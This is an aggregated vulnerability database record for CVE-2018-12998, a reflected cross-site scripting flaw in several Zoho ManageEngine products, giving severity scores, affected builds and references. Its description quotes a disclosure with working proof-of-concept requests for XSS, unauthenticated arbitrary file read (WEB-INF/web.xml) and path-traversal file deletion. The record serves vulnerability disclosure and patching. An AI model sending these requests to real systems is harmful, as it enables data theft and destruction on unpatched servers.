ID

VAR-201806-1164


CVE

CVE-2018-12998


TITLE

plural Zoho ManageEngine Product cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-006785

DESCRIPTION

A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. plural Zoho ManageEngine The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. There are cross-site scripting vulnerabilities in many ZOHO products. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html ========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me ========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. ========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ========================== POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue

Trust: 1.89

sources: NVD: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // PACKETSTORM: 148635

AFFECTED PRODUCTS

vendor:zohocorpmodel:firewall analyzerscope:eqversion: -

Trust: 1.6

vendor:zohocorpmodel:manageengine netflow analyzerscope:eqversion: -

Trust: 1.6

vendor:zohocorpmodel:manageengine opmanagerscope:eqversion: -

Trust: 1.0

vendor:zohocorpmodel:manageengine network configuration managerscope:eqversion: -

Trust: 1.0

vendor:zohocorpmodel:manageengine oputilsscope:eqversion: -

Trust: 1.0

vendor:zohomodel:manageengine firewall analyzerscope:ltversion:build 123147

Trust: 0.8

vendor:zohomodel:manageengine netflow analyzerscope:ltversion:build 123137

Trust: 0.8

vendor:zohomodel:manageengine network configuration managerscope:ltversion:build 123128

Trust: 0.8

vendor:zohomodel:manageengine opmanagerscope:ltversion:build 123148

Trust: 0.8

vendor:zohomodel:manageengine oputilsscope:ltversion:build 123161

Trust: 0.8

vendor:zohocorpmodel:network configuration managerscope:eqversion: -

Trust: 0.6

vendor:zohocorpmodel:oputilsscope:eqversion: -

Trust: 0.6

vendor:zohocorpmodel:opmanagerscope:eqversion: -

Trust: 0.6

sources: JVNDB: JVNDB-2018-006785 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-12998
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-12998
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201807-036
value: MEDIUM

Trust: 0.6

VULHUB: VHN-123013
value: MEDIUM

Trust: 0.1

VULMON: CVE-2018-12998
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-12998
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-123013
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-12998
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.1

Trust: 1.0

NVD: CVE-2018-12998
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-123013 // JVNDB: JVNDB-2018-006785 // NVD: CVE-2018-12998

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201807-036

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 148635 // CNNVD: CNNVD-201807-036

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-006785

PATCH

title:Top Pageurl:https://www.manageengine.com/

Trust: 0.8

title:Multiple ZOHO Fixes for product cross-site scripting vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81655

Trust: 0.6

title:Kenzer Templates [5170] [DEPRECATED]url:https://github.com/ARPSyndicate/kenzer-templates

Trust: 0.1

sources: VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // CNNVD: CNNVD-201807-036

EXTERNAL IDS

db:NVDid:CVE-2018-12998

Trust: 2.7

db:CNNVDid:CNNVD-201807-036

Trust: 2.4

db:PACKETSTORMid:148635

Trust: 1.9

db:JVNDBid:JVNDB-2018-006785

Trust: 0.8

db:VULHUBid:VHN-123013

Trust: 0.1

db:VULMONid:CVE-2018-12998

Trust: 0.1

sources: VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // PACKETSTORM: 148635 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

REFERENCES

url:https://github.com/unh3x/just4cve/issues/10

Trust: 2.6

url:http://seclists.org/fulldisclosure/2018/jul/75

Trust: 1.8

url:http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html

Trust: 1.8

url:http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-036

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2018-12998

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12998

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/79.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/arpsyndicate/kenzer-templates

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-12999

Trust: 0.1

url:https://www.manageengine.com/products/applications_manager/issues.html

Trust: 0.1

url:http://opmanager.helpdocsonline.com/read-me

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-12997

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-12996

Trust: 0.1

sources: VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // PACKETSTORM: 148635 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

CREDITS

Xiaotian Wang

Trust: 0.1

sources: PACKETSTORM: 148635

SOURCES

db:VULHUBid:VHN-123013
db:VULMONid:CVE-2018-12998
db:JVNDBid:JVNDB-2018-006785
db:PACKETSTORMid:148635
db:CNNVDid:CNNVD-201807-036
db:NVDid:CVE-2018-12998

LAST UPDATE DATE

2024-11-23T21:53:05.236000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-123013date:2018-08-20T00:00:00
db:VULMONid:CVE-2018-12998date:2023-12-07T00:00:00
db:JVNDBid:JVNDB-2018-006785date:2018-08-31T00:00:00
db:CNNVDid:CNNVD-201807-036date:2021-09-01T00:00:00
db:NVDid:CVE-2018-12998date:2024-11-21T03:46:13.193

SOURCES RELEASE DATE

db:VULHUBid:VHN-123013date:2018-06-29T00:00:00
db:VULMONid:CVE-2018-12998date:2018-06-29T00:00:00
db:JVNDBid:JVNDB-2018-006785date:2018-08-31T00:00:00
db:PACKETSTORMid:148635date:2018-07-22T17:22:56
db:CNNVDid:CNNVD-201807-036date:2018-07-02T00:00:00
db:NVDid:CVE-2018-12998date:2018-06-29T12:29:00.500